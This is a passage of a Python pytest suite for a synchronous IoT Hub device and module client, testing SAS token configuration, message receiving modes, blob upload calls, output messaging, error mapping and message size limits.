IoTHubDeviceClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
sas_config = IoTHubPipelineConfig(hostname=hostname, device_id=device_id, sastoken=sastoken)
return sas_config
@pytest.fixture
def sas_client(self, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def uri(self, hostname, device_id):
return "{hostname}/devices/{device_id}".format(hostname=hostname, device_id=device_id)
@pytest.fixture(params=["Nonmatching Device ID", "Nonmatching Hostname"])
def nonmatching_uri(self, request, device_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(hostname=hostname, device_id="nonmatching_device")
else:
return uri_format.format(hostname="nonmatching_hostname", device_id=device_id)
@pytest.fixture(
params=["Too short", "Too long", "Incorrectly formatted device notation", "Module URI"]
)
def invalid_uri(self, request, device_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have device ID
return hostname + "/devices"
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/somethingElse".format(hostname, device_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}".format(hostname, device_id)
else:
# Valid... for a Module... but this is a Device
return "{}/devices/{}/modules/my_module".format(hostname, device_id)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(
IoTHubDeviceClientTestsConfig, WaitsForEventCompletion
):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
) # Note: the return value this is checkign for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubDeviceClientOCCURANCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubDeviceClientOCCURANCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubModuleClientCreateFromSastoken(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromSastokenTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .update_sastoken()")
class TestIoTHubModuleClientUpdateSasToken(
IoTHubModuleClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def module_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# module id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
module_id = token_uri_pieces[4]
return module_id
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
module_id = token_uri_pieces[4]
sas_config = IoTHubPipelineConfig(
hostname=hostname, device_id=device_id, module_id=module_id, sastoken=sastoken
)
return sas_config
@pytest.fixture
def uri(self, hostname, device_id, module_id):
return "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=hostname, device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=["Nonmatching Device ID", "Nonmatching Module ID", "Nonmatching Hostname"]
)
def nonmatching_uri(self, request, device_id, module_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}/modules/{module_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(
hostname=hostname, device_id="nonmatching_device", module_id=module_id
)
elif request.param == "Nonmatching Module ID":
return uri_format.format(
hostname=hostname, device_id=device_id, module_id="nonmatching_module"
)
else:
return uri_format.format(
hostname="nonmatching_hostname", device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=[
"Too short",
"Too long",
"Incorrectly formatted device notation",
"Incorrectly formatted module notation",
"Device URI",
]
)
def invalid_uri(self, request, device_id, module_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have module ID
return "{}/devices/{}/modules".format(hostname, device_id)
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/modules/{}/somethingElse".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}/modules/{}".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted module notation":
# Doesn't have '/modules/'
return "{}/devices/{}/not-modules/{}".format(hostname, device_id, module_id)
else:
# Valid... for a Device... but this is a Module
return "{}/devices/{}/".format(hostname, device_id)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubNModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
# This check was put as message class may undergo the default content type encoding change
# and the above calculation will change.
# Had to do greater than check for python 2. Ideally should be not equal check
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
